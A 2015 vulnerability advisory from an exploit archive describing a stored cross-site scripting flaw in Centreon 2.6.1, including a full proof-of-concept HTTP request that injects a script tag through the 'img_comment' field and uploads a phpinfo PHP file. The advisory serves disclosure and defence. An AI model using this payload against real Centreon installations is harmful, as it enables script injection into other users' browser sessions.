Centreon 2.6.1 Persistent Cross Site Scripting

Centreon 2.6.1 Persistent Cross Site Scripting: Posted Sep 29, 2015; Authored by LiquidWorm | Site zeroscience.mk; Centreon version 2.6.1 suffers from a stored cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 6681b871f00d7c1d0d12d5de3f5e49d61b5ac631bdcefc4a0db93c3a54e96145; Download | Favorite | View

Centreon 2.6.1 Persistent Cross Site Scripting


Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability


Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)

Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.

Desc: Centreon suffers from a stored XSS vulnerability. Input
passed thru the POST parameter 'img_comment' is not sanitized
allowing the attacker to execute HTML code into user's browser
session on the affected site.

Tested on: CentOS 6.6 (Final)
           Apache/2.2.15
           PHP/5.3.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5266
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5266.php


10.08.2015

--


POST /centreon/main.php?p=50102 HTTP/1.1
Host: localhost.localdomain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a
Cookie: PHPSESSID=qg580onenijim611sca8or3o32
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993
Content-Length: 1195


-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="directories"

upload
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="list_dir"

0
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="filename"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?
phpinfo();
?>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_comment"

"><script>alert(1);</script>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="action[action]"

1
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="submitA"

Save
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_id"


-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="o"

a
-----------------------------951909060822176775828135993--

Top Authors In Last 30 Days

Red Hat 183 files
Ubuntu 59 files
Debian 20 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Google Security Research 6 files
E1.Coders 4 files
Ersin Erenler 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,007)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,166)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,428)
UNIX (9,390)
UnixWare (187)
Windows (6,647)
Other

Centreon 2.6.1 Persistent Cross Site Scripting

Centreon 2.6.1 Persistent Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Centreon 2.6.1 Persistent Cross Site Scripting

Share This

Centreon 2.6.1 Persistent Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems